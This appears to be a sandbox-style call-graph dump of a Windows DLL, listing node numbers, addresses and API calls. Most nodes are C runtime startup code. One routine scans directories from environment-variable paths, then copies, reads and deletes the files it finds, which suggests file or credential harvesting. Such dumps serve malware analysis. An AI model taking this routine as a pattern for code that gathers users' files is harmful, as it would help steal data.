6045->6034 6046->6047 6048 240c62ac 6047->6048 6051 240c6231 6048->6051 6050 240c62b8 6050->6045 6052 240c5b7a __dosmaperr 20 API calls 6051->6052 6053 240c6247 6052->6053 6054 240c62a6 6053->6054 6055 240c6255 6053->6055 6062 240c62bc IsProcessorFeaturePresent 6054->6062 6059 240c2ada _ValidateLocalCookies 5 API calls 6055->6059 6057 240c62ab 6058 240c6231 _abort 26 API calls 6057->6058 6060 240c62b8 6058->6060 6061 240c627c 6059->6061 6060->6050 6061->6050 6063 240c62c7 6062->6063 6066 240c60e2 6063->6066 6067 240c60fe ___scrt_fastfail 6066->6067 6068 240c612a IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6067->6068 6069 240c61fb ___scrt_fastfail 6068->6069 6070 240c2ada _ValidateLocalCookies 5 API calls 6069->6070 6071 240c6219 GetCurrentProcess TerminateProcess 6070->6071 6071->6057 7408 240c4bdd 7409 240c4bec 7408->7409 7410 240c4c08 7408->7410 7409->7410 7412 240c4bf2 7409->7412 7411 240c6d60 51 API calls 7410->7411 7413 240c4c0f GetModuleFileNameA 7411->7413 7414 240c6368 _free 20 API calls 7412->7414 7415 240c4c33 7413->7415 7416 240c4bf7 7414->7416 7431 240c4d01 7415->7431 7417 240c62ac _abort 26 API calls 7416->7417 7418 240c4c01 7417->7418 7423 240c4c66 7426 240c6368 _free 20 API calls 7423->7426 7424 240c4c72 7425 240c4d01 38 API calls 7424->7425 7427 240c4c88 7425->7427 7430 240c4c6b 7426->7430 7429 240c571e _free 20 API calls 7427->7429 7427->7430 7428 240c571e _free 20 API calls 7428->7418 7429->7430 7430->7428 7433 240c4d26 7431->7433 7435 240c4d86 7433->7435 7443 240c70eb 7433->7443 7434 240c4c50 7437 240c4e76 7434->7437 7435->7434 7436 240c70eb 38 API calls 7435->7436 7436->7435 7438 240c4e8b 7437->7438 7439 240c4c5d 7437->7439 7438->7439 7440 240c637b __dosmaperr 20 API calls 7438->7440 7439->7423 7439->7424 7441 240c4eb9 7440->7441 7442 240c571e _free 20 API calls 7441->7442 7442->7439 7446 240c7092 7443->7446 7447 240c54a7 __fassign 38 API calls 7446->7447 7448 240c70a6 7447->7448 7448->7433 6072 240c2418 6073 240c2420 ___scrt_release_startup_lock 6072->6073 6076 240c47f5 6073->6076 6075 240c2448 6077 240c4808 6076->6077 6078 240c4804 6076->6078 6081 240c4815 6077->6081 6078->6075 6082 240c5b7a __dosmaperr 20 API calls 6081->6082 6085 240c482c 6082->6085 6083 240c2ada _ValidateLocalCookies 5 API calls 6084 240c4811 6083->6084 6084->6075 6085->6083 7183 240c4a9a 7186 240c5411 7183->7186 7187 240c541d _abort 7186->7187 7188 240c5af6 _abort 38 API calls 7187->7188 7191 240c5422 7188->7191 7189 240c55a8 _abort 38 API calls 7190 240c544c 7189->7190 7191->7189 5737 240c1c5b 5738 240c1c6b ___scrt_fastfail 5737->5738 5741 240c12ee 5738->5741 5740 240c1c87 5742 240c1324 ___scrt_fastfail 5741->5742 5743 240c13b7 GetEnvironmentVariableW 5742->5743 5767 240c10f1 5743->5767 5746 240c10f1 57 API calls 5747 240c1465 5746->5747 5748 240c10f1 57 API calls 5747->5748 5749 240c1479 5748->5749 5750 240c10f1 57 API calls 5749->5750 5751 240c148d 5750->5751 5752 240c10f1 57 API calls 5751->5752 5753 240c14a1 5752->5753 5754 240c10f1 57 API calls 5753->5754 5755 240c14b5 lstrlenW 5754->5755 5756 240c14d9 lstrlenW 5755->5756 5766 240c14d2 5755->5766 5757 240c10f1 57 API calls 5756->5757 5758 240c1501 lstrlenW lstrcatW 5757->5758 5759 240c10f1 57 API calls 5758->5759 5760 240c1539 lstrlenW lstrcatW 5759->5760 5761 240c10f1 57 API calls 5760->5761 5762 240c156b lstrlenW lstrcatW 5761->5762 5763 240c10f1 57 API calls 5762->5763 5764 240c159d lstrlenW lstrcatW 5763->5764 5765 240c10f1 57 API calls 5764->5765 5765->5766 5766->5740 5768 240c1118 ___scrt_fastfail 5767->5768 5769 240c1129 lstrlenW 5768->5769 5780 240c2c40 5769->5780 5771 240c1148 lstrcatW lstrlenW 5772 240c1168 lstrlenW 5771->5772 5773 240c1177 lstrlenW FindFirstFileW 5771->5773 5772->5773 5774 240c11a0 5773->5774 5775 240c11e1 5773->5775 5776 240c11aa 5774->5776 5777 240c11c7 FindNextFileW 5774->5777 5775->5746 5776->5777 5782 240c1000 5776->5782 5777->5774 5779 240c11da FindClose 5777->5779 5779->5775 5781 240c2c57 5780->5781 5781->5771 5781->5781 5783 240c1022 ___scrt_fastfail 5782->5783 5784 240c10af 5783->5784 5785 240c102f lstrcatW lstrlenW 5783->5785 5788 240c10b5 lstrlenW 5784->5788 5798 240c10ad 5784->5798 5786 240c105a lstrlenW 5785->5786 5787 240c106b lstrlenW 5785->5787 5786->5787 5799 240c1e89 lstrlenW 5787->5799 5813 240c1e16 5788->5813 5791 240c1088 GetFileAttributesW 5793 240c109c 5791->5793 5791->5798 5792 240c10ca 5794 240c1e89 5 API calls 5792->5794 5792->5798 5793->5798 5805 240c173a 5793->5805 5795 240c10df 5794->5795 5818 240c11ea 5795->5818 5798->5776 5800 240c2c40 ___scrt_fastfail 5799->5800 5801 240c1ea7 lstrcatW lstrlenW 5800->5801 5802 240c1ed1 lstrcatW 5801->5802 5803 240c1ec2 5801->5803 5802->5791 5803->5802 5804 240c1ec7 lstrlenW 5803->5804 5804->5802 5806 240c1747 ___scrt_fastfail 5805->5806 5833 240c1cca 5806->5833 5809 240c199f 5809->5798 5811 240c1824 ___scrt_fastfail _strlen 5811->5809 5853 240c15da 5811->5853 5814 240c1e29 5813->5814 5817 240c1e4c 5813->5817 5815 240c1e2d lstrlenW 5814->5815 5814->5817 5816 240c1e3f lstrlenW 5815->5816 5815->5817 5816->5817 5817->5792 5819 240c120e ___scrt_fastfail 5818->5819 5820 240c1e89 5 API calls 5819->5820 5821 240c1220 GetFileAttributesW 5820->5821 5822 240c1235 5821->5822 5823 240c1246 5821->5823 5822->5823 5825 240c173a 35 API calls 5822->5825 5824 240c1e89 5 API calls 5823->5824 5826 240c1258 5824->5826 5825->5823 5827 240c10f1 56 API calls 5826->5827 5828 240c126d 5827->5828 5829 240c1e89 5 API calls 5828->5829 5830 240c127f ___scrt_fastfail 5829->5830 5831 240c10f1 56 API calls 5830->5831 5832 240c12e6 5831->5832 5832->5798 5834 240c1cf1 ___scrt_fastfail 5833->5834 5835 240c1d0f CopyFileW CreateFileW 5834->5835 5836 240c1d44 DeleteFileW 5835->5836 5837 240c1d55 GetFileSize 5835->5837 5842 240c1808 5836->5842 5838 240c1ede 22 API calls 5837->5838 5839 240c1d66 ReadFile 5838->5839 5840 240c1d7d CloseHandle DeleteFileW 5839->5840 5841 240c1d94 CloseHandle DeleteFileW 5839->5841 5840->5842 5841->5842 5842->5809 5843 240c1ede 5842->5843 5845 240c222f 5843->5845 5846 240c224e 5845->5846 5848 240c2250 5845->5848 5861 240c474f 5845->5861 5866 240c47e5 5845->5866 5846->5811 5849 240c2908 5848->5849 5873 240c35d2 5848->5873 5850 240c35d2 __CxxThrowException@8 RaiseException 5849->5850 5852 240c2925 5850->5852 5852->5811 5854 240c160c _strcat _strlen 5853->5854 5855 240c163c lstrlenW 5854->5855 5961 240c1c9d 5855->5961 5857 240c1655 lstrcatW lstrlenW 5858 240c1678 5857->5858 5859 240c167e lstrcatW 5858->5859 5860 240c1693 ___scrt_fastfail 5858->5860 5859->5860 5860->5811 5876 240c4793 5861->5876 5864 240c478f 5864->5845 5865 240c4765 5882 240c2ada 5865->5882 5871 240c56d0 __dosmaperr 5866->5871 5867 240c570e 5895 240c6368 5867->5895 5869 240c56f9 RtlAllocateHeap 5870 240c570c 5869->5870 5869->5871 5870->5845 5871->5867 5871->5869 5872 240c474f __dosmaperr 7 API calls 5871->5872 5872->5871 5874 240c35f2 RaiseException 5873->5874 5874->5849 5877 240c479f ___DestructExceptionObject 5876->5877 5889 240c5671 RtlEnterCriticalSection 5877->5889 5879 240c47aa 5890 240c47dc 5879->5890 5881 240c47d1 _abort 5881->5865 5883 240c2ae5 IsProcessorFeaturePresent 5882->5883 5884 240c2ae3 5882->5884 5886 240c2b58 5883->5886 5884->5864 5894 240c2b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 5886->5894 5888 240c2c3b 5888->5864 5889->5879 5893 240c56b9 RtlLeaveCriticalSection 5890->5893 5892 240c47e3 5892->5881 5893->5892 5894->5888 5898 240c5b7a GetLastError 5895->5898 5899 240c5b99 5898->5899 5900 240c5b93 5898->5900 5905 240c5bf0 SetLastError 5899->5905 5924 240c637b 5899->5924 5917 240c5e08 5900->5917 5904 240c5bb3 5931 240c571e 5904->5931 5906 240c5bf9 5905->5906 5906->5870 5910 240c5bb9 5912 240c5be7 SetLastError 5910->5912 5911 240c5bcf 5944 240c593c 5911->5944 5912->5906 5915 240c571e _free 17 API calls 5916 240c5be0 5915->5916 5916->5905 5916->5912 5949 240c5c45 5917->5949 5919 240c5e2f 5920 240c5e47 TlsGetValue 5919->5920 5923 240c5e3b 5919->5923 5920->5923 5921 240c2ada _ValidateLocalCookies 5 API calls 5922 240c5e58 5921->5922 5922->5899 5923->5921 5929 240c6388 __dosmaperr 5924->5929 5925 240c63c8 5928 240c6368 _free 19 API calls 5925->5928 5926 240c63b3 RtlAllocateHeap 5927 240c5bab 5926->5927 5926->5929 5927->5904 5937 240c5e5e 5927->5937 5928->5927 5929->5925 5929->5926 5930 240c474f __dosmaperr 7 API calls 5929->5930 5930->5929 5932 240c5729 HeapFree 5931->5932 5933 240c5752 _free 5931->5933 5932->5933 5934 240c573e 5932->5934 5933->5910 5935 240c6368 _free 18 API calls 5934->5935 5936 240c5744 GetLastError 5935->5936 5936->5933 5938 240c5c45 __dosmaperr 5 API calls 5937->5938 5939 240c5e85 5938->5939 5940 240c5ea0 TlsSetValue 5939->5940 5941 240c5e94 5939->5941 5940->5941 5942 240c2ada _ValidateLocalCookies 5 API calls 5941->5942 5943 240c5bc8 5942->5943 5943->5904 5943->5911 5955 240c5914 5944->5955 5951 240c5c71 5949->5951 5953 240c5c75 __crt_fast_encode_pointer 5949->5953 5950 240c5c95 5950->5953 5954 240c5ca1 GetProcAddress 5950->5954 5951->5950 5952 240c5ce1 __dosmaperr LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 5951->5952 5951->5953 5952->5951 5953->5919 5954->5953 5956 240c5854 __dosmaperr RtlEnterCriticalSection RtlLeaveCriticalSection 5955->5956 5957 240c5938 5956->5957 5958 240c58c4 5957->5958 5959 240c5758 __dosmaperr 20 API calls 5958->5959 5960 240c58e8 5959->5960 5960->5915 5962 240c1ca6 _strlen 5961->5962 5962->5857 7449 240c20db 7451 240c20e7 ___DestructExceptionObject 7449->7451 7450 240c20f6 7451->7450 7452 240c2110 dllmain_raw 7451->7452 7456 240c210b 7451->7456 7452->7450 7453 240c212a 7452->7453 7462 240c1eec 7453->7462 7455 240c2177 7455->7450 7457 240c1eec 31 API calls 7455->7457 7456->7450 7456->7455 7459 240c1eec 31 API calls 7456->7459 7458 240c218a 7457->7458 7458->7450 7460 240c2193 dllmain_raw 7458->7460 7461 240c216d dllmain_raw 7459->7461 7460->7450 7461->7455 7463 240c1f2a dllmain_crt_process_detach 7462->7463 7464 240c1ef7 7462->7464 7471 240c1f06 7463->7471 7465 240c1f1c dllmain_crt_process_attach 7464->7465 7466 240c1efc 7464->7466 7465->7471 7467 240c1f01 7466->7467 7468 240c1f12 7466->7468 7467->7471 7472 240c240b 7467->7472 7477 240c23ec 7468->7477 7471->7456 7485 240c53e5 7472->7485 7578 240c3513 7477->7578 7480 240c23f5 7480->7471 7483 240c2408 7483->7471 7484 240c351e 7 API calls 7484->7480 7491 240c5aca 7485->7491 7488 240c351e 7567 240c3820 7488->7567 7490 240c2415 7490->7471 7492 240c5ad4 7491->7492 7493 240c2410 7491->7493 7494 240c5e08 __dosmaperr 11 API calls 7492->7494 7493->7488 7495 240c5adb 7494->7495 7495->7493 7496 240c5e5e __dosmaperr 11 API calls 7495->7496 7497 240c5aee 7496->7497 7499 240c59b5 7497->7499 7500 240c59c0 7499->7500 7504 240c59d0 7499->7504 7505 240c59d6 7500->7505 7503 240c571e _free 20 API calls 7503->7504 7504->7493 7506 240c59e9 7505->7506 7507 240c59ef 7505->7507 7508 240c571e _free 20 API calls 7506->7508 7509 240c571e _free 20 API calls 7507->7509 7508->7507 7510 240c59fb 7509->7510 7511 240c571e _free 20 API calls 7510->7511 7512 240c5a06 7511->7512 7513 240c571e _free 20 API calls 7512->7513 7514 240c5a11 7513->7514 7515 240c571e _free 20 API calls 7514->7515 7516 240c5a1c 7515->7516 7517 240c571e _free 20 API calls 7516->7517 7518 240c5a27 7517->7518 7519 240c571e _free 20 API calls 7518->7519 7520 240c5a32 7519->7520 7521 240c571e _free 20 API calls 7520->7521 7522 240c5a3d 7521->7522 7523 240c571e _free 20 API calls 7522->7523 7524 240c5a48 7523->7524 7525 240c571e _free 20 API calls 7524->7525 7526 240c5a56 7525->7526 7531 240c589c 7526->7531 7537 240c57a8 7531->7537 7533 240c58c0 7534 240c58ec 7533->7534 7550 240c5809 7534->7550 7536 240c5910 7536->7503 7538 240c57b4 ___DestructExceptionObject 7537->7538 7545 240c5671 RtlEnterCriticalSection 7538->7545 7540 240c57e8 7546 240c57fd 7540->7546 7541 240c57be 7541->7540 7544 240c571e _free 20 API calls 7541->7544 7543 240c57f5 _abort 7543->7533 7544->7540 7545->7541 7549 240c56b9 RtlLeaveCriticalSection 7546->7549 7548 240c5807 7548->7543 7549->7548 7551 240c5815 ___DestructExceptionObject 7550->7551 7558 240c5671 RtlEnterCriticalSection 7551->7558 7553 240c581f 7559 240c5a7f 7553->7559 7555 240c5832 7563 240c5848 7555->7563 7557 240c5840 _abort 7557->7536 7558->7553 7560 240c5ab5 __fassign 7559->7560 7561 240c5a8e __fassign 7559->7561 7560->7555 7561->7560 7562 240c7cc2 __fassign 20 API calls 7561->7562 7562->7560 7566 240c56b9 RtlLeaveCriticalSection 7563->7566 7565 240c5852 7565->7557 7566->7565 7568 240c384b ___vcrt_freefls@4 7567->7568 7569 240c382d 7567->7569 7568->7490 7570 240c383b 7569->7570 7573 240c3b67 7569->7573 7572 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7570->7572 7572->7568 7574 240c3a82 try_get_function 5 API calls 7573->7574 7575 240c3b81 7574->7575 7576 240c3b99 TlsGetValue 7575->7576 7577 240c3b8d 7575->7577 7576->7577 7577->7570 7584 240c3856 7578->7584 7580 240c23f1 7580->7480 7581 240c53da 7580->7581 7582 240c5b7a __dosmaperr 20 API calls 7581->7582 7583 240c23fd 7582->7583 7583->7483 7583->7484 7585 240c385f 7584->7585 7586 240c3862 GetLastError 7584->7586 7585->7580 7587 240c3b67 ___vcrt_FlsGetValue 6 API calls 7586->7587 7588 240c3877 7587->7588 7589 240c38dc SetLastError 7588->7589 7590 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7588->7590 7595 240c3896 7588->7595 7589->7580 7591 240c3890 7590->7591 7592 240c38b8 7591->7592 7593 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7591->7593 7591->7595 7594 240c3ba2 ___vcrt_FlsSetValue 6 API calls 7592->7594 7592->7595 7593->7592 7594->7595 7595->7589 7596 240c73d5 7597 240c73e1 ___DestructExceptionObject 7596->7597 7608 240c5671 RtlEnterCriticalSection 7597->7608 7599 240c73e8 7609 240c8be3 7599->7609 7601 240c73f7 7607 240c7406 7601->7607 7622 240c7269 GetStartupInfoW 7601->7622 7605 240c7417 _abort 7633 240c7422 7607->7633 7608->7599 7610 240c8bef ___DestructExceptionObject 7609->7610 7611 240c8bfc 7610->7611 7612 240c8c13 7610->7612 7614 240c6368 _free 20 API calls 7611->7614 7636 240c5671 RtlEnterCriticalSection 7612->7636 7615 240c8c01 7614->7615 7616 240c62ac _abort 26 API calls 7615->7616 7617 240c8c0b _abort 7616->7617 7617->7601 7618 240c8c1f 7621 240c8c4b 7618->7621 7637 240c8b34 7618->7637 7644 240c8c72 7621->7644 7623 240c7286 7622->7623 7625 240c7318 7622->7625 7624 240c8be3 27 API calls 7623->7624 7623->7625 7626 240c72af 7624->7626 7628 240c731f 7625->7628 7626->7625 7627 240c72dd GetFileType 7626->7627 7627->7626 7630 240c7326 7628->7630 7629 240c7369 GetStdHandle 7629->7630 7630->7629 7631 240c73d1 7630->7631 7632 240c737c GetFileType 7630->7632 7631->7607 7632->7630 7648 240c56b9 RtlLeaveCriticalSection 7633->7648 7635 240c7429 7635->7605 7636->7618 7638 240c637b __dosmaperr 20 API calls 7637->7638 7640 240c8b46 7638->7640 7639 240c8b53 7641 240c571e _free 20 API calls 7639->7641 7640->7639 7643 240c5eb7 11 API calls 7640->7643 7642 240c8ba5 7641->7642 7642->7618 7643->7640 7647 240c56b9 RtlLeaveCriticalSection 7644->7647 7646 240c8c79 7646->7617 7647->7646 7648->7635 7649 240c4ed7 7650 240c6d60 51 API calls 7649->7650 7651 240c4ee9 7650->7651 7660 240c7153 GetEnvironmentStringsW 7651->7660 7655 240c571e _free 20 API calls 7656 240c4f29 7655->7656 7657 240c4eff 7658 240c571e _free 20 API calls 7657->7658 7659 240c4ef4 7658->7659 7659->7655 7661 240c716a 7660->7661 7671 240c71bd 7660->7671 7664 240c7170 WideCharToMultiByte 7661->7664 7662 240c4eee 7662->7659 7672 240c4f2f 7662->7672 7663 240c71c6 FreeEnvironmentStringsW 7663->7662 7665 240c718c 7664->7665 7664->7671 7666 240c56d0 21 API calls 7665->7666 7667 240c7192 7666->7667 7668 240c7199 WideCharToMultiByte 7667->7668 7669 240c71af 7667->7669 7668->7669 7670 240c571e _free 20 API calls 7669->7670 7670->7671 7671->7662 7671->7663 7673 240c4f44 7672->7673 7674 240c637b __dosmaperr 20 API calls 7673->7674 7683 240c4f6b 7674->7683 7675 240c4fcf 7676 240c571e _free 20 API calls 7675->7676 7677 240c4fe9 7676->7677 7677->7657 7678 240c637b __dosmaperr 20 API calls 7678->7683 7679 240c4fd1 7680 240c5000 20 API calls 7679->7680 7682 240c4fd7 7680->7682 7681 240c544d ___std_exception_copy 26 API calls 7681->7683 7685 240c571e _free 20 API calls 7682->7685 7683->7675 7683->7678 7683->7679 7683->7681 7684 240c4ff3 7683->7684 7687 240c571e _free 20 API calls 7683->7687 7686 240c62bc _abort 11 API calls 7684->7686 7685->7675 7688 240c4fff 7686->7688 7687->7683 7192 240c3c90 RtlUnwind 7689 240c36d0 7690 240c36e2 7689->7690 7692 240c36f0 @_EH4_CallFilterFunc@8 7689->7692 7691 240c2ada _ValidateLocalCookies 5 API calls 7690->7691 7691->7692 6930 240c5351 6931 240c5360 6930->6931 6935 240c5374 6930->6935 6933 240c571e _free 20 API calls 6931->6933 6931->6935 6932 240c571e _free 20 API calls 6934 240c5386 6932->6934 6933->6935 6936 240c571e _free 20 API calls 6934->6936 6935->6932 6937 240c5399 6936->6937 6938 240c571e _free 20 API calls 6937->6938 6939 240c53aa 6938->6939 6940 240c571e _free 20 API calls 6939->6940 6941 240c53bb 6940->6941 7193 240c60ac 7194 240c60dd 7193->7194 7195 240c60b7 7193->7195 7195->7194 7196 240c60c7 FreeLibrary 7195->7196 7196->7195 6942 240c506f 6943 240c5087 6942->6943 6944 240c5081 6942->6944 6945 240c5000 20 API calls 6944->6945 6945->6943 6086 240c742b 6087 240c7430 6086->6087 6088 240c7453 6087->6088 6090 240c8bae 6087->6090 6091 240c8bbb 6090->6091 6092 240c8bdd 6090->6092 6093 240c8bc9 RtlDeleteCriticalSection 6091->6093 6094 240c8bd7 6091->6094 6092->6087 6093->6093 6093->6094 6095 240c571e _free 20 API calls 6094->6095 6095->6092 6946 240cac6b 6947 240cac84 __startOneArgErrorHandling 6946->6947 6948 240cacad __startOneArgErrorHandling 6947->6948 6950 240cb2f0 6947->6950 6951 240cb329 __startOneArgErrorHandling 6950->6951 6952 240cb5c1 __raise_exc RaiseException 6951->6952 6953 240cb350 __startOneArgErrorHandling 6951->6953 6952->6953 6954 240cb393 6953->6954 6956 240cb36e 6953->6956 6955 240cb8b2 __startOneArgErrorHandling 20 API calls 6954->6955 6958 240cb38e __startOneArgErrorHandling 6955->6958 6961 240cb8e1 6956->6961 6959 240c2ada _ValidateLocalCookies 5 API calls 6958->6959 6960 240cb3b7 6959->6960 6960->6948 6962 240cb8f0 6961->6962 6963 240cb90f __startOneArgErrorHandling 6962->6963 6964 240cb964 __startOneArgErrorHandling 6962->6964 6966 240c78a3 __startOneArgErrorHandling 5 API calls 6963->6966 6965 240cb8b2 __startOneArgErrorHandling 20 API calls 6964->6965 6969 240cb95d 6965->6969 6967 240cb950 6966->6967 6968 240cb8b2 __startOneArgErrorHandling 20 API calls 6967->6968 6967->6969 6968->6969 6969->6958 5963 240cc7a7 5964 240cc7be 5963->5964 5968 240cc82c 5963->5968 5964->5968 5975 240cc7e6 GetModuleHandleA 5964->5975 5965 240cc835 GetModuleHandleA 5969 240cc83f 5965->5969 5966 240cc872 5968->5965 5968->5966 5968->5969 5969->5968 5970 240cc85f GetProcAddress 5969->5970 5970->5968 5971 240cc7dd 5971->5968 5971->5969 5972 240cc800 GetProcAddress 5971->5972 5972->5968 5973 240cc80d VirtualProtect 5972->5973 5973->5968 5974 240cc81c VirtualProtect 5973->5974 5974->5968 5976 240cc7ef 5975->5976 5981 240cc82c 5975->5981 5987 240cc803 GetProcAddress 5976->5987 5978 240cc7f4 5978->5981 5982 240cc800 GetProcAddress 5978->5982 5979 240cc835 GetModuleHandleA 5985 240cc83f 5979->5985 5980 240cc872 5981->5979 5981->5980 5981->5985 5982->5981 5983 240cc80d VirtualProtect 5982->5983 5983->5981 5984 240cc81c VirtualProtect 5983->5984 5984->5981 5985->5981 5986 240cc85f GetProcAddress 5985->5986 5986->5981 5988 240cc82c 5987->5988 5989 240cc80d VirtualProtect 5987->5989 5991 240cc835 GetModuleHandleA 5988->5991 5992 240cc872 5988->5992 5989->5988 5990 240cc81c VirtualProtect 5989->5990 5990->5988 5994 240cc83f 5991->5994 5993 240cc85f GetProcAddress 5993->5994 5994->5988 5994->5993 7197 240c81a0 7198 240c81d9 7197->7198 7199 240c81dd 7198->7199 7210 240c8205 7198->7210 7200 240c6368 _free 20 API calls 7199->7200 7202 240c81e2 7200->7202 7201 240c8529 7204 240c2ada _ValidateLocalCookies 5 API calls 7201->7204 7203 240c62ac _abort 26 API calls 7202->7203 7206 240c81ed 7203->7206 7205 240c8536 7204->7205 7207 240c2ada _ValidateLocalCookies 5 API calls 7206->7207 7209 240c81f9 7207->7209 7210->7201 7211 240c80c0 7210->7211 7214 240c80db 7211->7214 7212 240c2ada _ValidateLocalCookies 5 API calls 7213 240c8152 7212->7213 7213->7210 7214->7212 7693 240ca1e0 7696 240ca1fe 7693->7696 7695 240ca1f6 7697 240ca203 7696->7697 7698 240caa53 21 API calls 7697->7698 7699 240ca298 7697->7699 7700 240ca42f 7698->7700 7699->7695 7700->7695 7215 240c21a1 ___scrt_dllmain_exception_filter 6096 240c543d 6097 240c5440 6096->6097 6100 240c55a8 6097->6100 6111 240c7613 6100->6111 6104 240c55c2 IsProcessorFeaturePresent 6107 240c55cd 6104->6107 6106 240c55b8 6106->6104 6110 240c55e0 6106->6110 6108 240c60e2 _abort 8 API calls 6107->6108 6108->6110 6141 240c4bc1 6110->6141 6144 240c7581 6111->6144 6114 240c766e 6115 240c767a _abort 6114->6115 6116 240c5b7a __dosmaperr 20 API calls 6115->6116 6118 240c76a1 _abort 6115->6118 6121 240c76a7 _abort 6115->6121 6116->6118 6117 240c76f3 6119 240c6368 _free 20 API calls 6117->6119 6118->6117 6118->6121 6140 240c76d6 6118->6140 6120 240c76f8 6119->6120 6122 240c62ac _abort 26 API calls 6120->6122 6126 240c771f 6121->6126 6158 240c5671 RtlEnterCriticalSection 6121->6158 6122->6140 6128 240c777e 6126->6128 6130 240c7776 6126->6130 6137 240c77a9 6126->6137 6159 240c56b9 RtlLeaveCriticalSection 6126->6159 6128->6137 6160 240c7665 6128->6160 6131 240c4bc1 _abort 28 API calls 6130->6131 6131->6128 6136 240c7665 _abort 38 API calls 6136->6137 6163 240c782e 6137->6163 6138 240c780c 6139 240c5af6 _abort 38 API calls 6138->6139 6138->6140 6139->6140 6187 240cbdc9 6140->6187 6191 240c499b 6141->6191 6147 240c7527 6144->6147 6146 240c55ad 6146->6106 6146->6114 6148 240c7533 ___DestructExceptionObject 6147->6148 6153 240c5671 RtlEnterCriticalSection 6148->6153 6150 240c7541 6154 240c7575 6150->6154 6152 240c7568 _abort 6152->6146 6153->6150 6157 240c56b9 RtlLeaveCriticalSection 6154->6157 6156 240c757f 6156->6152 6157->6156 6158->6126 6159->6130 6161 240c5af6 _abort 38 API calls 6160->6161 6162 240c766a 6161->6162 6162->6136 6164 240c77fd 6163->6164 6165 240c7834 6163->6165 6164->6138 6164->6140 6167 240c5af6 GetLastError 6164->6167 6190 240c56b9 RtlLeaveCriticalSection 6165->6190 6168 240c5b0c 6167->6168 6169 240c5b12 6167->6169 6171 240c5e08 __dosmaperr 11 API calls 6168->6171 6170 240c637b __dosmaperr 20 API calls 6169->6170 6174 240c5b61 SetLastError 6169->6174 6172 240c5b24 6170->6172 6171->6169 6173 240c5b2c 6172->6173 6175 240c5e5e __dosmaperr 11 API calls 6172->6175 6176 240c571e _free 20 API calls 6173->6176 6174->6138 6177 240c5b41 6175->6177 6178 240c5b32 6176->6178 6177->6173 6179 240c5b48 6177->6179 6180 240c5b6d SetLastError 6178->6180 6181 240c593c __dosmaperr 20 API calls 6179->6181 6182 240c55a8 _abort 35 API calls 6180->6182 6183 240c5b53 6181->6183 6184 240c5b79 6182->6184 6185 240c571e _free 20 API calls 6183->6185 6186 240c5b5a 6185->6186 6186->6174 6186->6180 6188 240c2ada _ValidateLocalCookies 5 API calls 6187->6188 6189 240cbdd4 6188->6189 6189->6189 6190->6164 6192 240c49a7 _abort 6191->6192 6193 240c49bf 6192->6193 6213 240c4af5 GetModuleHandleW 6192->6213 6222 240c5671 RtlEnterCriticalSection 6193->6222 6197 240c4a65 6230 240c4aa5 6197->6230 6200 240c4a3c 6204 240c4a54 6200->6204 6226 240c4669 6200->6226 6202 240c4aae 6207 240cbdc9 _abort 5 API calls 6202->6207 6203 240c4a82 6233 240c4ab4 6203->6233 6209 240c4669 _abort 5 API calls 6204->6209 6212 240c4ab3 6207->6212 6209->6197 6210 240c49c7 6210->6197 6210->6200 6223 240c527a 6210->6223 6214 240c49b3 6213->6214 6214->6193 6215 240c4b39 GetModuleHandleExW 6214->6215 6216 240c4b63 GetProcAddress 6215->6216 6217 240c4b78 6215->6217 6216->6217 6218 240c4b8c FreeLibrary 6217->6218 6219 240c4b95 6217->6219 6218->6219 6220 240c2ada _ValidateLocalCookies 5 API calls 6219->6220 6221 240c4b9f 6220->6221 6221->6193 6222->6210 6241 240c5132 6223->6241 6227 240c4698 6226->6227 6228 240c2ada _ValidateLocalCookies 5 API calls 6227->6228 6229 240c46c1 6228->6229 6229->6204 6263 240c56b9 RtlLeaveCriticalSection 6230->6263 6232 240c4a7e 6232->6202 6232->6203 6264 240c6025 6233->6264 6236 240c4ae2 6239 240c4b39 _abort 8 API calls 6236->6239 6237 240c4ac2 GetPEB 6237->6236 6238 240c4ad2 GetCurrentProcess TerminateProcess 6237->6238 6238->6236 6240 240c4aea ExitProcess 6239->6240 6244 240c50e1 6241->6244 6243 240c5156 6243->6200 6245 240c50ed ___DestructExceptionObject 6244->6245 6252 240c5671 RtlEnterCriticalSection 6245->6252 6247 240c50fb 6253 240c515a 6247->6253 6251 240c5119 _abort 6251->6243 6252->6247 6254 240c517a 6253->6254 6255 240c5182 6253->6255 6256 240c2ada _ValidateLocalCookies 5 API calls 6254->6256 6255->6254 6258 240c571e _free 20 API calls 6255->6258 6257 240c5108 6256->6257 6259 240c5126 6257->6259 6258->6254 6262 240c56b9 RtlLeaveCriticalSection 6259->6262 6261 240c5130 6261->6251 6262->6261 6263->6232 6265 240c604a 6264->6265 6266 240c6040 6264->6266 6267 240c5c45 __dosmaperr 5 API calls 6265->6267 6268 240c2ada _ValidateLocalCookies 5 API calls 6266->6268 6267->6266 6269 240c4abe 6268->6269 6269->6236 6269->6237 6270 240c1f3f 6271 240c1f4b ___DestructExceptionObject 6270->6271 6288 240c247c 6271->6288 6273 240c1f52 6274 240c1f7c 6273->6274 6275 240c2041 6273->6275 6282 240c1f57 ___scrt_is_nonwritable_in_current_image 6273->6282 6299 240c23de 6274->6299 6311 240c2639 IsProcessorFeaturePresent 6275->6311 6278 240c2048 6279 240c1f8b __RTC_Initialize 6279->6282 6302 240c22fc RtlInitializeSListHead 6279->6302 6281 240c1f99 ___scrt_initialize_default_local_stdio_options 6303 240c46c5 6281->6303 6286 240c1fb8 6286->6282 6287 240c4669 _abort 5 API calls 6286->6287 6287->6282 6289 240c2485 6288->6289 6315 240c2933 IsProcessorFeaturePresent 6289->6315 6293 240c2496 6294 240c249a 6293->6294 6326 240c53c8 6293->6326 6294->6273 6297 240c24b1 6297->6273 6400 240c24b5 6299->6400 6301 240c23e5 6301->6279 6302->6281 6306 240c46dc 6303->6306 6304 240c2ada _ValidateLocalCookies 5 API calls 6305 240c1fad 6304->6305 6305->6282 6307 240c23b3 6305->6307 6306->6304 6308 240c23b8 ___scrt_release_startup_lock 6307->6308 6309 240c2933 ___isa_available_init IsProcessorFeaturePresent 6308->6309 6310 240c23c1 6308->6310 6309->6310 6310->6286 6312 240c264e ___scrt_fastfail 6311->6312 6313 240c26f9 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 6312->6313 